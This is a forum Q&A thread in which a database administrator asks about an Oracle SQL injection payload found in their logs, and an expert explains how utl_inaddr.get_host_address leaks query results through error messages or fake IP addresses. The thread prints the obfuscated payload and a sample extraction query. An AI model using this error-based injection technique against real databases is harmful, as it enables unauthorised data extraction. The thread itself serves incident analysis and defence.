Solved

sql injection to select utl_inaddr.get_host_address and XS$CACHE_DELETE

Posted on 2014-01-15
7
1,744 Views
Last Modified: 2014-01-15
found that someone use sql injection to run this sql in my oracle database via web application. I don't get his purpose. why use utl_inaddr.get_host_address and number of columns in XS$CACHE_DELETE???

select utl_inaddr.get_host_address(((
SELECT CAST (COUNT (column_name) AS CHAR (10))
  FROM all_tab_columns
 WHERE table_name =
             CHR (88)
          || CHR (83)
          || CHR (36)
          || CHR (67)
          || CHR (65)
          || CHR (67)
          || CHR (72)
          || CHR (69)
          || CHR (95)
          || CHR (68)
          || CHR (69)
          || CHR (76)
          || CHR (69)
          || CHR (84)
          || CHR (69)
))) from dual

Open in new window

0
Comment
Question by:Hoboly
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 4
  • 3
7 Comments
 
LVL 74

Assisted Solution

by:sdstuber
sdstuber earned 500 total points
ID: 39784466
Do you have a table called "XS$CACHE_DELETE"  ?


The purpose of using utl_inaddr.get_host_address  is a quirk of the error message returned by the function.  If the host name passed in produces an error, that "name" will be returned as part of the error

For example....

select utl_inaddr.get_host_address('something that will produce an error') from dual

ORA-29257: host something that will produce an error unknown
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Open in new window


So, by nesting a query inside the function call , the query is executed and the output of the query is taken as a host name that will likely be illegal and generate an error.  Then that illegal text will be returned as part of the error message
0
 

Author Comment

by:Hoboly
ID: 39784470
no XS$DELETE
but these is a table XS$CACHE_DELETE

SQL> desc XS$CACHE_DELETE
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 OBJ_TYPE                                           NUMBER(2)
 NAME                                               VARCHAR2(4000)
 DEL_DATE                                  NOT NULL TIMESTAMP(6)

SQL>

should be standard oracle 11g table
0
 

Author Comment

by:Hoboly
ID: 39784471
thanks Sdstuber
but I don't get it why COUNT (column_name)  into utl_inaddr.get_host_address.
if he wants to get the ip, he can just use utl_inaddr.get_host_address(host name) instead of utl_inaddr.get_host_address(column count)
0
Secure Your WordPress Site: 5 Essential Approaches

WordPress is the web's most popular CMS, but its dominance also makes it a target for attackers. Our eBook will show you how to:

Prevent costly exploits of core and plugin vulnerabilities
Repel automated attacks
Lock down your dashboard, secure your code, and protect your users

 
LVL 74

Accepted Solution

by:
sdstuber earned 500 total points
ID: 39784476
He doesn't want an ip address, he wants the query results.
That's the key to the injection.  By failing you get to see the inner query results.
Or by constructing a query that returns a numeric result that number will appear as part of an ip address even though it really isn't one.


Try this...

SELECT UTL_INADDR.get_host_address(
           'There are ' || (SELECT COUNT(*) FROM dba_tables) || ' tables in this database'
       )
  FROM DUAL;

You should get an error something like this.
The 2923 will be vary based on your system.


ORA-29257: host There are 2923 tables in this database unknown



As I said above, the inner query is executed and the results are returned in the error.
0
 
LVL 74

Expert Comment

by:sdstuber
ID: 39784483
XS$CACHE_DELETE - sorry, I posted that then saw my mistake and corrected it.

I don't know of a specific hack to utilize that table or its contents; but it's mere existence would tell the hacker that XDB has been installed and that knowledge can provide a new attack vector.
0
 
LVL 74

Expert Comment

by:sdstuber
ID: 39784487
Actually, on further review of the initial query,  the error message part probably isn't going to happen.  Sorry for the confusion

If you run the injection query you should get either

0.0.0.0    -- meaning you do not have the table, i.e. XDB is not installed
 or
0.0.0.3    -- meaning you do have the table, i.e XDB is installed


Using the same technique though,  you can execute other queries and check the error messages to see what the results of those queries will be
0
 

Author Closing Comment

by:Hoboly
ID: 39784490
Excellent explanation! Thanks!
0

Featured Post

Back Up Your Microsoft Windows Server®

Back up all your Microsoft Windows Server – on-premises, in remote locations, in private and hybrid clouds. Your entire Windows Server will be backed up in one easy step with patented, block-level disk imaging. We achieve RTOs (recovery time objectives) as low as 15 seconds.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This post first appeared at Oracleinaction  (http://oracleinaction.com/undo-and-redo-in-oracle/)by Anju Garg (Myself). I  will demonstrate that undo for DML’s is stored both in undo tablespace and online redo logs. Then, we will analyze the reaso…
Meet the world's only “Transparent Cloud™” from Superb Internet Corporation. Now, you can experience firsthand a cloud platform that consistently outperforms Amazon Web Services (AWS), IBM’s Softlayer, and Microsoft’s Azure when it comes to CPU and …
This video shows setup options and the basic steps and syntax for duplicating (cloning) a database from one instance to another. Examples are given for duplicating to the same machine and to different machines
This video shows how to Export data from an Oracle database using the Datapump Export Utility.  The corresponding Datapump Import utility is also discussed and demonstrated.
Suggested Courses

617 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question